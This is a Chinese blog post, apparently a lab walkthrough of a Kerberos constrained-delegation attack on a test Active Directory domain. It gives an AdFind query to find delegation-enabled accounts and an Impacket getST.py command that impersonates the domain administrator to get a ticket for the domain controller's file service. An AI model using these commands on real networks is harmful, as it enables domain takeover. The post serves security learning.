约束委派攻击实验

N0zoM1z0

于 2024-10-02 20:02:27 发布

阅读量116

点赞数 1

分类专栏： IntraNet 文章标签： windows

本文链接：https://blog.csdn.net/ULGANOY/article/details/142684490

版权

IntraNet 专栏收录该内容

15 篇文章 0 订阅

订阅专栏

1. 实验网络拓扑

kali: 
192.168.72.128

win2008:
192.168.135.129
192.168.72.139

win7:
192.168.72.149

win2012:(DC)
192.168.72.131

2. 环境搭建

配置约束委派。

先建一个test用户，然后配置spn，使其变成服务账户，然后配委派。

委派到 DC的CIFS服务。

在这里插入图片描述

然后AdFind查找域内有约束委派的服务账号和被委派的SPN：

AdFind.exe -b "DC=intranet,DC=com" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))"

在这里插入图片描述

3. EXPLOIT

用Impacket的getST.py

我们用服务账户test的凭据，代表域管获得访问域控CIFS的ST票据：

python3 getST.py -dc-ip 192.168.72.131 intranet.com/test:123qweQWE -spn cifs/dc.intranet.com -impersonate administrator

然后ptt就行了。

在这里插入图片描述

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

N0zoM1z0

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

约束委派攻击原理与利用

内心不种满鲜花就会长满杂草

04-11

7310

约束委派攻击主要利用了Windows域环境中的Kerberos协议及其扩展S4U（Service for User to Self和Service for User to Proxy）机制。约束委派是微软在Windows Server 2003中引入的一种安全机制，旨在限制服务账户在模拟用户时仅能访问特定的服务，而非所有服务。这一机制通过Kerberos协议的S4U2Self和S4U2Proxy两个子协议实现。

非约束委派攻击原理与利用

内心不种满鲜花就会长满杂草

04-07

5454

在Kerberos认证体系中，用户通过票据（如TGT和ST）来访问服务。TGT（Ticket-Granting Ticket）是用户向密钥分发中心（KDC）请求并获得的，用于后续请求服务票据（ST）。ST则是用户访问特定服务时所需的票据。

参与评论您还未登录，请先登录后发表或查看评论

域内攻击 -----＞约束&&非约束委派攻击

huohaowen的博客

05-25

969

首先，什么是委派呢？域委派是指将域内用户的权限委派给服务账户，使得服务账号能够以用户的权限在域内展开活动接着，什么样的对象才能被委派呢？主机账号：活动目中中的Computers组内的计算机，也被称为机器账号服务账号：域内用户的一种类型，是服务器运行服务时所用的账号。那么我们去域控上面看一看，顺便说一下本次实验环境后续实验环境皆在此基础上进行先来看机器账号，怎么查看域内的机器有几台呢？完了喜欢eason被你发现捏然后我们去域控上看，DEV和COMPUTERS这两个组。

【内网安全】横向移动&非约束委派&约束委派&资源约束委派&数据库攻防

今天是几号的博客

04-05

1660

由于非约束委派的不安全性，微软在windows server 2003中引入了约束委派，对Kerberos协议进行了拓展，总的来说，如果需要在Windows环境中使用委派功能，建议使用约束委派而不是非约束委派，以提高系统和数据的安全性。攻击者拿到了一台配置非约束委派的机器权限，可以诱导域管来访问该机器，然后得到管理员的TGT，从而模拟域管用户。机器A（域控）访问具有非约束委派权限的机器B的服务，会把当前认证用户（域管用户）的的TGT放在ST票据中，

Kerberos-非约束性委派攻击

m0_75218183的博客

06-07

447

概念：服务账号可以获取被委派用户的TGT，并将TGT缓存到lsass进程中，从而服务账号可使用该TGT，模拟该用户访问域内其他服务。非约束委派的设置需要SeEnableDelegationPrivilege权限，该特权通常只有域管理员才有。

[内网渗透]—约束委派攻击

Sentiment的博客

12-08

877

首先了解一下什么是委派，委派即委托安排，我把这件事委托给你做了。域委派是指将域内用户的权限委派给服务账号，使得服务账号能以用户的权限在域内展开活动。

域内安全：委派攻击

8888的博客

08-30

1217

从攻击角度来说：如果攻击者拿到了一台配置了非约束委派的机器权限，可以诱导管理员来访问该机器，然后可以得到管理员的TGT，从而模拟管理员访问任意服务，相当于拿下了整个域环境，或者结合打印机漏洞让域管用户强制回连以缓存 TGT，一个域内用户访问WEB服务，但是一些资源在文件服务上，这个时候就需要委派，需要web系统代表用户A去访问文件服务的资源。3、这个时候如果域管访问了机器我们的内存中就会有域管的TGT，就可以访问任意机器了，在与域控上执行访问(在域控上执行)

内网安全：非约束委派约束委派资源约束委派

qq_61553520的博客

01-28

1714

实验靶场：redteam.red。

Kerberos 域委派攻击之非约束性委派

Adminxe的博客

03-06

893

CSDN文章自动迁移自博客在Windows 2000 Server 首次发布 Active Directory 时，Microsoft 必须提供一种简单的机制来支持用户通过 Kerberos 向 Web Server 进行身份验证并需要代表该用户更新后端数据库服务器上的记录的方案。这通常称为“Kerberos 双跳问题”，并且要求进行委派，以便 Web Server 在修改数据库记录时模拟用户。Windows 2000 Server 发布的也是最初的非约束性委派。需要注意的一点是接受委派的用户只能是。

rubeus+spoolsample.zip域渗透非约束性委派攻击实验

08-19

通过这个实验，你可以了解非约束性委派攻击的原理，以及如何使用Rubeus和SpoolSample进行模拟攻击。这不仅有助于提高你的渗透测试技能，还可以帮助你在实际环境中识别并抵御此类威胁。请确保在合法和授权的范围内...

Kerberos中继攻击：滥用无约束委派（下）

systemino的博客

10-10

1065

上一篇文章，我只讲了中继攻击的基本理论，这篇文章，我会举两个示例来及具体说明。示例1：使用计算机帐户和SpoolService漏洞获取DC同步权限在第一种情况下，我们将滥用我的internal.corp实验室域中的计算机帐户的无约束委派权限。通过攻击用户testuser获得了此主机的管理权限，该用户是该主机上Administrators组的成员。我们将按照上面列出的步骤，首先获取Kerbe...

新版双向链表，添加了at, front, back, insert, emplace等为了兼容std.

weixin_42944928的博客

09-26

432

【代码】新版双向链表，添加了at, front, back, insert, emplace等为了兼容std.

C++软件试用期检测

一个大佬的博客

09-29

602

试用期已过，请先注册。

C# 泛型使用案例_C# 泛型使用整理

天马3798

09-28

525

2.泛型委托，输入参数，输出参数。2. 自定义规则和类型，求和处理。3.泛型任务，多线程，异步编程。1. 任意类型数据交换。

Java工具--stream流

约束委派攻击 实验

1. 实验网络拓扑

2. 环境搭建

3. EXPLOIT

约束委派攻击实验